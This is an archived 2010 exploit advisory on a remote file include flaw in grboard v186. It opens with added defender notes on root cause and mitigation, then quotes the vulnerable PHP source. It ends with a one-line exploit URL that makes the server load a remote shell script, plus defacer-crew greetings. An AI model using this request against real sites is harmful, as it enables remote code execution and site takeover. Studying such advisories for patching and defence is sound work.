
grboard v186 Remote File Include Vulnerability

Posted on 30 May 2010

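<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>grboard v186 Remote File Include Vulnerability</title>
  <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">
  <link rel="alternate" type="application/rss+xml" title="Inj3ct0r RSS" href="/rss">
</head>
<body>
  <!--
    Archived advisory; the author's text is reproduced below as posted.
    Reading notes for defenders and maintainers:

    Root cause as described: the quoted list.php excerpt runs
    include_once $path."/thumbnail.php", and the advisory's request supplies
    "path" in the query string. The excerpt does not show where $path is
    assigned, so the request value presumably reaches it through
    register_globals or an equivalent import of request variables
    (confirm against the full file).

    Mitigation: build the include path in code from a fixed base such as
    dirname(__FILE__) rather than from a variable a request can set, keep
    register_globals and allow_url_include disabled, and deny direct web
    access to scripts that are only meant to be included.

    Also visible in the excerpt: $id is interpolated into the SQL string and
    echoed into an href without escaping. Its origin is not shown here; if it
    is request-derived, use parameterised queries and htmlspecialchars().

    The Korean source comments were double-escaped in the original page and
    are restored as numeric character references. In English they read:
    "call the GD thumbnail engine used by the latest gallery",
    "post loop", and "fetch and process the first attachment of each post".
  -->
<pre>
==============================================
grboard v186 Remote File Include Vulnerability
==============================================

# Author : untouch
# Location : jakarta - Indonesia
# Situs : antijasakom[dot]org, autosaved[dot]wordpress[dot]com
# Contact : unkn0wn[dot]cr3w[at]ymail[dot]com
# Script: http://sirini.net/grboard/board.php?id=grskin&amp;articleNo=82
# Download: http://sirini.net/grboard/download.php?id=grskin&amp;articleNo=82&amp;num=1

######################################################################
#&lt;div class="latestGalleryTitle"&gt;&lt;a href="&lt;?php echo $grboard; ?&gt;/board.php?id=&lt;?php echo $id; ?&gt;"&gt;&lt;?php echo $latestTitle; ?&gt;&lt;/a&gt;&lt;/div&gt;
#&lt;?php
#// &#52572;&#44540;&#44068;&#47084;&#47532;&#50640; &#50416;&#51068; GD &#50040;&#45348;&#51068; &#50644;&#51652; &#48512;&#47476;&#44592;
#include_once $path."/thumbnail.php";
#
#// &#44172;&#49884;&#47932; &#47336;&#54532;
#while($latest = mysql_fetch_array($getData))
#{
# // &#44033; &#44172;&#49884;&#47932;&#45817; &#52392;&#48512;&#54028;&#51068; &#52395;&#48264;&#51704; &#44163; &#44032;&#51256;&#50752;&#49436; &#52376;&#47532;
# $target = $latest['no'];
# $file = @mysql_fetch_array(mysql_query("select file_route1 from {$dbFIX}pds_save where id = '$id' and article_num = '$target'"));
# ?&gt;
#&lt;div class="latestGalleryPhoto"&gt;&lt;a href="&lt;?php echo $grboard; ?&gt;/board.php?id=&lt;?php echo $id; ?&gt;&amp;amp;articleNo=&lt;?php echo $latest['no']; ?&gt;"&gt;
#&lt;?php echo makeLatestThumb($grboard."/".$file['file_route1'], $path, $id, $grboard, 100, 100); ?&gt;&lt;/a&gt;&lt;/div&gt;
# &lt;?php
#} # while
#?&gt;
#&lt;div class="latestGalleryClear"&gt;&lt;/div&gt;
######################################################################

#######################################################################################################
Exploit: http://[target]/[path]/latest/sirini_gallery2_play/list.php?path=http://[shellscript]
#######################################################################################################

#Special Thanks :
- Gorontalo Defacer : cr4wl3r, bl4ck_3n91n3, aries.deris, Tawon Sparta
- AntiJasakom Crew : Shamus, boys_rvn1609, 5ynL0rd, kqaj, dbugr, kiddies, g4pt3k
- all Indogamers Admin &amp; Moderator

# Note : Don't Be Affraid to Attack Your Own Network ~

# <a href="http://inj3ct0r.com/">Inj3ct0r.com</a> [2010-05-30]
</pre>
</body>
</html>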

 
